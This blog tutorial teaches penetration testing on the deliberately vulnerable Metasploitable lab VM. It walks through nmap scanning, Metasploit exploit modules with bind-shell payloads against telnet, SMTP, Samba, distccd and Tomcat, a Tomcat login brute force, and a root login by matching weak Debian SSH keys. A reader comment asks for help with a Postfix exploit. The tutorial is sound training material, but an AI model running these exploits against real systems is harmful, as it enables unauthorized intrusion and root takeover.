Metasploitable: MSF Exploitation

Metasploitable: MSF Exploitation 

0x00 Overview

Today I'll be writing a guide on how to exploit Metasploitable with the Metasploit Framework. Who is this tutorial for? This tutorial is for anyone who is interested in beginning a journey as a Penetration Tester. This tutorial will encompass

  • A nice overview on how to use the Metasploit Framework by searching, and using some Modules and launching Exploits.
  • It will show you how to Scan, and Exploit running services against a target using the MSF.
  • It will show you how to use 1 public exploit later explained.
This VM im booting is specifically designed to be exploited with Metasploit. But I will be using on public exploit from that I have used personally in the past.

Victims IP Address:
Attacker's IP Address:

NOTE: BT4-R2 is what I will be using to Exploit the VM. BT-4 Final does not yield the same results, so keep that in mind. Without further ado, lets begin…

0x01 Enumeration

The most important part of any Penetration Test is Enumeration, the information you gather will be the information you will use to plan an attack against your target.
  • First lets start off with a simple Nmap Scan to reveal the open ports and running services of our target.
As Pen-Testers, we need to understand what these services do and also we need to familiarize ourselves with common running services for future Audits.

Some common services include, but are not limited to:
  • FTP
  • Telnet
  • SSH
  • IMAP
  • POP3
  • MySQL
These running services can be Daemonized and continuously show up all the majority of all targets.

Sometimes Nmap Scans will not show EVERY open port, therefore, I also ran Nessusagainst our target to catch what Nmap did not.

NOTE: Operating System Identification is essential for the payloads and some exploits that we will be launching. This VM is NOT windows, therefore, we need to use *nix Payloads instead of Windows Payloads if we want to get a session when the exploit succeeds.

To scan the Running Services on the Metasploitable Machine (, ill be doing a SYN Stealth Scan to identify the services:

nmap -sS -sV

21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1

0x02 Exploiting Running Services 

Based on the Nmap Scan, we can see that we have a couple Running Services.

Exploiting Telnet : Port 23

Lets being by exploiting Telnet!
  • Telnet provides an unencrypted channel between clients and the server. Attackers can take advantage of users using Telnet with ARP Cache Poisoning. 
Now that we have a potentially vulnerable service, lets go to the ./msfconsole and search for the available exploits.

NOTE: Updating the Metasploit Framework will not be necessary for this video, if left un-updated, you will get the same results.

On the MSF console type search telnet

The exploit that we will be using is solaris/telnet/fuser. This is a Telnet Remote Authentication Bypass exploit for Telnet. Now in order to use that exploit one will type:
use solaris/telnet/fuser

Now we need to set the options for this exploit in order for it to work properly. To see the options you need to set you type: show options. Now continue to set the specifications for this exploit.

set RPORT 23
set USER bin

The default remote port is 23 and the default username to use is bin.

Now that we have everything set for the exploit, we need to choose a payload. The payload i will be using will be the cmd/unix/bind_perl. But you can pick your own by typing show payloads to see the other available payloads you can use for that exploit. To use that payload we type set payload cmd/unix/bind_perl
Now we need to set the requirements for the payload as well if its not done for you:

show options

Now that we have everything set, for both exploit and payload, our next step is just to simple call exploit to launch it. Typing exploit, will launch the exploit and as you can see, it was successful!

Exploiting Postfix SMTPd : Port 25 

Lets continue to exploit another running service, in this case, SMTP.
  • Without going in too much detail, the Postfiix SMTP server is used to receive mail from the network. It can be heavily spammed and can also be exposed to junk mail and viruses!
On the MSF console type search smtp.

The exploit that we will be using is unix/smtp/clamav_milter_blackhole. This is a Remote Code Execution exploit for this SMTP. Now in order to use that exploit one will type:
use unix/smtp/clamav_milter_blackhole

Now, just like before, we need to set the options for this exploit in order for it to work properly. Again, see the options you need to set you type: show options, and continue to set the specifications for this exploit.

set RPORT 25

The default remote port is 25, but these are the only options we are interested in setting.

Now that we have everything set for the exploit, lets continue to choose a payload. The payload i will be using will be the cmd/unix/bind_ruby. Be sure to specify that's the payload you will be utilizing by typing set payload cmd/unix/bind_ruby. Once again,we need to set the requirements for the payload.

show options

Now that everything is set, typing exploit will launch the exploit successfully!

Exploiting Samba SMBd 3.x : Port 139

The next service to be exploited lies on port 139.
  • Understanding networks protocols is essential to Network Penetration testing. Samba is the product name but what we need to understand is what SMB is. Service Message Block is a protocol used for sharing files and printers between computers, that's what is for. 
Lets search for samba exploits by typing search samba.
The exploit that we will be using is multi/samba/usermap_script. This exploit is used for Command Execution. Now in order to use that exploit one will type:

use multi/samba/usermap_script

Lets continue to set the exploit's requirements that we are interested in:

set RPORT 139

The default remote port is 139. Now lets continue to choose our desired payload. The payload ill be using is cmd/unix/bind_ruby. Lets continue to set the payload, set the options for the payload, and launch the exploit:

set payload cmd/unix/bind_ruby
show options

Exploit successful

Exploiting distccd : Port 3632

Remember that Nessus Scan we did prior to exploitation? This is where we got this running service Nmap did not pick up.
  • Simply put, distcc is a program designed to distribute compiling tasks across a network to participating hosts. 
The Nessus Scan Describes it as...
  • Distcc is a program to distribute builds of C, C++, Objective C or Objective C++ code across several machines on a network. Distcc should always generate the same results as a local build, is simple to install and use, and is often two or more times faster than a local compile. Distcc by default trusts its clients completely that in turn could allow a malicious client to execute arbitrary commands on the server.
Lets search for anything related with this service by typing search distccd

The exploit I'll be using for this service is the unix/misc/distcc_exec. This is a Daemon Command Execution exploit. Now lets repeat the previous steps all in one, including choosing the payload to save time.

use unix/misc/distcc_exec
show options
set RPORT 3632
set payload cmd/unix/bind_ruby
show options

By default, the port is 3632. But as you can see, the exploit succeeded.

Exploiting Apache Tomcat/Coyote JSP Engine 1.1

I left Apache for last because i had to use an Auxiliary to get the username and password and then and exploit to break into the VM.

First lets start with the Auxiliary Module by typing search tomcat

The Auxiliary I'll be using is the scanner/http/tomcat_mgr_login. This is to bruteforce theTomcat Application Manager Login. So to use this we type use scanner/http/tomcat_mgr_login. Now the only options we need to set is the remote host and then launch the exploit:


If you scroll up on the green you can see that the credentials are set as tomcat:tomcatwhich are defaults.

Now how can we use this to our advantage? We can either go to the Daemon and log into the manager or exploit it further and get a shell.

Once again we type search tomcat and found this exploit multi/http/tomcat_mgr_deploy. This exploit is tomcat's Application Manager Deployer Upload and Execute. Sounds good enough to test! Now lets use that exploit, set the specifications, choose a payload, set the requierments and launch the exploit

use multi/http/tomcat_mgr_deploy
show options
set RPORT 8180
set USERNAME tomcat
set PASSWORD tomcat
set payload generic/shell_bind_tcp
show options

As expected, we have a shell against the target.

Launching a Public Exploit

Now lets do some snooping around. Based on the Nmap Scan, we know that the target usesSSH so what we are interested to look for is the Authorized Keys. By default they are placed in the root.

Here is more information about SSH Authorized Keys
  • AuthorizedKeyFile specifies containing public key for public key authentication. It lists the public keys (RSA/DSA) that can be used for logging in as this user.
Lets go ahead and read this file by catting out the output:

cat /root/.ssh/authorized_keys

As you can see there is it. The exploit we are going to launch is located here:

However, we are not going to be using the code. This system have week SSH Keys. As described in the link of the exploit, there are a certain amount of possible SSH keys, so we can bruteforce them.

We can download these RSA Keys from here:

Now on a new terminal, type tar jxvf to extract the Keys to the /root/ then type cd /rsa/2048

Back on the shell we have on MSF lets grab the entire key which will be:
AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkct ​ eZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXl ​ n/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ ​5cCs4WocyVxsXovcNnbALTp3w

We need to find this on the Keys we extracted. Go on the terminal we type:

grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkct ​ eZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXl ​ n/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ ​5cCs4WocyVxsXovcNnbALTp3w *.pub

to find the exact match and make it recursive. This will find the public RSA key that we will use to authenticate as root. This is the result you get.

All those letters and numbers is the identity file for SSH. Now we simply just type:

ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@ 

And we are in as root :)

0x03 Final Words

Well this is the end of this tutorial. Overall, using Metasploitable is a great way to learn how to use Metasploit and some of its features. There are other lab environment that provide the same Penetration challenge but through different Methodologies.With that being said, Ill conclude this tutorial.


This comment has been removed by the author.

hey am trying to exploit a postfix smtp vulnerabilty

25/tcp open smtp Postfix smtpd


tried both the exploits but reaching nowhere need help

General info

Linux version 2.6.24-16-generic (buildd@palmer) (gcc version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)) (kernal)

postfix 2.5.1-2ubuntu1 High-performance mail transport agent (postfix smtp version )
thank you


Post a Comment